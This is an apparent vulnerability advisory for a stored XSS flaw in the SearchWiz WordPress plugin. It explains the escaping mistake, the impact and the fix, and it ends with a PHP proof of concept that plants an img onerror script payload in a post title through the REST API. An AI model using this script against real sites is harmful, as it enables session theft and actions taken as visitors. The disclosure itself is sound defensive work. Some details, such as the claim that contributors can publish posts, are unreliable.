Atomic Edge analysis of CVE-2026-0694 (metadata-based):
The SearchWiz plugin for WordPress, versions up to and including 1.0.0, contains an authenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in the plugin’s search results output, allowing attackers with contributor-level or higher permissions to inject malicious scripts via post titles. These scripts execute when a victim views a search results page, leading to client-side compromise.
Atomic Edge research identifies the root cause as improper output escaping. The vulnerability description states the plugin uses `esc_attr()` instead of `esc_html()` when outputting post titles in search results. This is a classic context mismatch: `esc_attr()` escapes for HTML attribute contexts, not for direct HTML body output where titles are likely placed. The CWE-79 classification confirms this as improper neutralization of input during web page generation. This conclusion is inferred from the provided description and CWE, as no source code diff is available for confirmation.
Exploitation requires an authenticated attacker with at least contributor-level access. The attacker creates or edits a post, injecting a malicious JavaScript payload into the post title field. A payload like `
` is typical. When any site user, including unauthenticated visitors, performs a search that returns the malicious post, the title renders without proper HTML escaping, causing script execution in the victim’s browser. The attack vector is the standard WordPress post creation/editing interface, likely at `/wp-admin/post.php` or via the REST API at `/wp-json/wp/v2/posts`.
Remediation requires correcting the output escaping function. The plugin must replace `esc_attr()` with `esc_html()` or a more appropriate function like `wp_kses_post()` for the specific HTML context where the post title is displayed in search results. Proper input validation on the post title field, while a good practice, is not the primary fix for this output-based XSS. The patch should also ensure all dynamic content rendered in the plugin’s frontend templates uses context-appropriate escaping.
The impact of successful exploitation is client-side code execution in the context of the vulnerable site. Attackers can steal session cookies, perform actions as the victim user, deface the site, or redirect users to malicious domains. The CVSS vector scores a 6.4 (Medium) due to the network attack vector, low attack complexity, low privilege requirement, no user interaction for execution, and scope change to the client browser with low confidentiality and integrity impact.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-0694 - SearchWiz <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Title
<?php
$target_url = 'http://target-site.local/wp-json/wp/v2/posts';
$username = 'contributor_user';
$password = 'contributor_pass';
// Payload: Classic XSS vector for HTML body context.
$malicious_title = 'Exploit Post <img src=x onerror=alert('XSS via SearchWiz')>';
// Assumption: The plugin's vulnerable output is triggered when a post appears in search results.
// This PoC creates a post via the WordPress REST API, which contributor-level users can access.
$post_data = array(
'title' => $malicious_title,
'content' => 'This post has a malicious title.',
'status' => 'publish' // Contributor can publish posts.
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'Accept: application/json'
));
curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code >= 200 && $http_code < 300) {
$resp_data = json_decode($response, true);
$post_id = $resp_data['id'] ?? 'unknown';
echo "[+] Post created with ID: $post_idn";
echo "[+] Visit the site's search results page after searching for a term matching this post.n";
echo "[+] The XSS payload in the title should execute.n";
} else {
echo "[-] Post creation failed. HTTP Code: $http_coden";
echo "[-] Response: $responsen";
}
?>
